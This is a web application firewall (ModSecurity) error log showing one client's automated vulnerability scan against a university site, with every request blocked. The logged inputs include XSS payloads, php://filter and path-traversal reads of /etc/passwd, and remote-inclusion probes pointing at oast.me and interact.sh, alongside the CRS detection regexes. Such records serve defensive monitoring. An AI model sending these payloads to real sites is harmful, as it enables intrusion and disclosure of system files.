[Tue Aug 29 11:53:11.804380 2023] [:error] [pid 2006] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:gallery_current_index. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:gallery_current_index: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO15t8Co-f0AAAfWOU4AAAAL"]
[Tue Aug 29 11:53:11.884237 2023] [:error] [pid 2598] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:redirect. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x0d\\x0a\\x0d\\x0a< found within ARGS:redirect: setting.htm\\x0d\\x0a\\x0d\\x0a<script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/man.cgi"] [unique_id "ZO15t8Co-f0AAAoml1wAAAAf"]
[Tue Aug 29 11:53:12.080952 2023] [:error] [pid 2591] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:customctid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:customctid: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/webadmin/policy/category_table_ajax.php"] [unique_id "ZO15uMCo-f0AAAofm5QAAAAX"]
[Tue Aug 29 11:53:12.662964 2023] [:error] [pid 2582] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:FirstName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: > found within ARGS:FirstName: <img src onerror=alert(document.domain)>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "digilibft.unla.ac.id"] [uri "/wp-content/plugins/crm-perks-forms/templates/sample_file.php"] [unique_id "ZO15uMCo-f0AAAoW7NcAAAAJ"]
[Tue Aug 29 11:53:14.462105 2023] [:error] [pid 2592] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:Filename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '></ found within ARGS:Filename: Filename'></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/wp-content/plugins/podcast-channels/getid3/demos/demo.write.php"] [unique_id "ZO15usCo-f0AAAog@C8AAAAY"]
[Tue Aug 29 11:53:14.634716 2023] [:error] [pid 2590] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://oast.me/ found within TX:1: oast.me/"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilibft.unla.ac.id"] [uri "/Images/Remote"] [unique_id "ZO15usCo-f0AAAoesMIAAAAV"]
[Tue Aug 29 11:53:15.768780 2023] [:error] [pid 2606] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://oast.me/ found within TX:1: oast.me/"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilibft.unla.ac.id"] [uri "/Items/RemoteSearch/Image"] [unique_id "ZO15u8Co-f0AAAouCzYAAAAo"]
[Tue Aug 29 11:53:16.589391 2023] [:error] [pid 2606] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:token. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22);} found within ARGS:token: asdf\\x22);}alert(document.domain); function asdf() {//"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/atutor/login.php"] [unique_id "ZO15vMCo-f0AAAouCzkAAAAo"]
[Tue Aug 29 11:53:17.647570 2023] [:error] [pid 2560] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh/ found within TX:1: interact.sh/"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilibft.unla.ac.id"] [uri "/wp-content/plugins/brandfolder/callback.php"] [unique_id "ZO15vcCo-f0AAAoAkyQAAAAC"]
[Tue Aug 29 11:53:18.716588 2023] [:error] [pid 2560] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:post. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:post: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/wp-content/plugins/emag-marketplace-connector/templates/order/awb-meta-box.php"] [unique_id "ZO15vsCo-f0AAAoAkygAAAAC"]
[Tue Aug 29 11:53:18.808859 2023] [:error] [pid 2603] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:input_file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:input_file: php://filter/resource=/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilibft.unla.ac.id"] [uri "/dompdf.php"] [unique_id "ZO15vsCo-f0AAAor7rEAAAAk"]
[Tue Aug 29 11:53:19.843531 2023] [:error] [pid 2609] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:input_file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:input_file: php://filter/resource=/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilibft.unla.ac.id"] [uri "/PhpSpreadsheet/Writer/PDF/DomPDF.php"] [unique_id "ZO15v8Co-f0AAAox7FkAAAAN"]
[Tue Aug 29 11:53:19.847876 2023] [:error] [pid 2560] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS_NAMES:"/><script>alert(1)</script>. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS_NAMES:\\x22/><script>alert(1)</script>: \\x22/><script>alert(1)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15v8Co-f0AAAoAkykAAAAC"]
[Tue Aug 29 11:53:20.050629 2023] [:error] [pid 2552] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:input_file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:input_file: php://filter/resource=/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilibft.unla.ac.id"] [uri "/lib/dompdf/dompdf.php"] [unique_id "ZO15wMCo-f0AAAn404kAAAAW"]
[Tue Aug 29 11:53:20.708054 2023] [:error] [pid 2609] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:input_file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:input_file: php://filter/resource=/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilibft.unla.ac.id"] [uri "/includes/dompdf/dompdf.php"] [unique_id "ZO15wMCo-f0AAAox7GAAAAAN"]
[Tue Aug 29 11:53:21.637719 2023] [:error] [pid 2552] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:input_file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:input_file: php://filter/resource=/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilibft.unla.ac.id"] [uri "/wp-content/plugins/web-portal-lite-client-portal-secure-file-sharing-private-messaging/includes/libs/pdf/dompdf.php"] [unique_id "ZO15wcCo-f0AAAn405AAAAAW"]
[Tue Aug 29 11:53:22.529218 2023] [:error] [pid 2611] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:input_file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:input_file: php://filter/resource=/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilibft.unla.ac.id"] [uri "/wp-content/plugins/buddypress-component-stats/lib/dompdf/dompdf.php"] [unique_id "ZO15wsCo-f0AAAoz70wAAAAS"]
[Tue Aug 29 11:53:22.539093 2023] [:error] [pid 2605] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:controller: ../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15wsCo-f0AAAot8PQAAAAn"]
[Tue Aug 29 11:53:23.387206 2023] [:error] [pid 2530] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:movie_param. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:movie_param: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/wp-content/plugins/avchat-3/index_popup.php"] [unique_id "ZO15w8Co-f0AAAni-DsAAAAU"]
[Tue Aug 29 11:53:24.083619 2023] [:error] [pid 2608] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:input_file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:input_file: php://filter/resource=/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilibft.unla.ac.id"] [uri "/wp-content/plugins/abstract-submission/dompdf-0.5.1/dompdf.php"] [unique_id "ZO15xMCo-f0AAAowNogAAAAH"]
[Tue Aug 29 11:53:24.647643 2023] [:error] [pid 2597] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:input_file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:input_file: php://filter/resource=/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilibft.unla.ac.id"] [uri "/wp-content/plugins/post-pdf-export/dompdf/dompdf.php"] [unique_id "ZO15xMCo-f0AAAolKWUAAAAe"]
[Tue Aug 29 11:53:24.693571 2023] [:error] [pid 2530] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS_NAMES:urls[<img src=x onerror=alert(document.domain)>]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: = found within ARGS_NAMES:urls[<img src=x onerror=alert(document.domain)>]: urls[<img src=x onerror=alert(document.domain)>]"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "digilibft.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO15xMCo-f0AAAni-D0AAAAU"]
[Tue Aug 29 11:53:25.703711 2023] [:error] [pid 2605] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:query. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:query: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/search"] [unique_id "ZO15xcCo-f0AAAot8PwAAAAn"]
[Tue Aug 29 11:53:26.254711 2023] [:error] [pid 2530] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:input_file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:input_file: php://filter/resource=/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilibft.unla.ac.id"] [uri "/wp-content/plugins/blogtopdf/dompdf/dompdf.php"] [unique_id "ZO15xsCo-f0AAAni-EMAAAAU"]
[Tue Aug 29 11:53:26.877203 2023] [:error] [pid 2609] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:input_file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:input_file: php://filter/resource=/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilibft.unla.ac.id"] [uri "/wp-content/plugins/gboutique/library/dompdf/dompdf.php"] [unique_id "ZO15xsCo-f0AAAox7G0AAAAN"]
[Tue Aug 29 11:53:27.022937 2023] [:error] [pid 2612] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:input_file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:input_file: php://filter/resource=/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilibft.unla.ac.id"] [uri "/wp-content/plugins/wp-ecommerce-shop-styling/includes/dompdf/dompdf.php"] [unique_id "ZO15x8Co-f0AAAo0gN8AAAAZ"]
[Tue Aug 29 11:53:27.484028 2023] [:error] [pid 2590] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:file: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilibft.unla.ac.id"] [uri "/wp-content/plugins/wp-swimteam/include/user/download.php"] [unique_id "ZO15x8Co-f0AAAoesOQAAAAV"]
[Tue Aug 29 11:53:28.045435 2023] [:error] [pid 2006] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:module. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:module: module\\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/mods/clansphere/lang_modvalidate.php"] [unique_id "ZO15yMCo-f0AAAfWOXkAAAAL"]
[Tue Aug 29 11:53:28.815615 2023] [:error] [pid 2605] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:command. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x95\\x5c\\x8e\\xa6 found within ARGS:command: \\x95\\x5c\\x8e\\xa6"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/Solar_History.php"] [unique_id "ZO15yMCo-f0AAAot8QIAAAAn"]
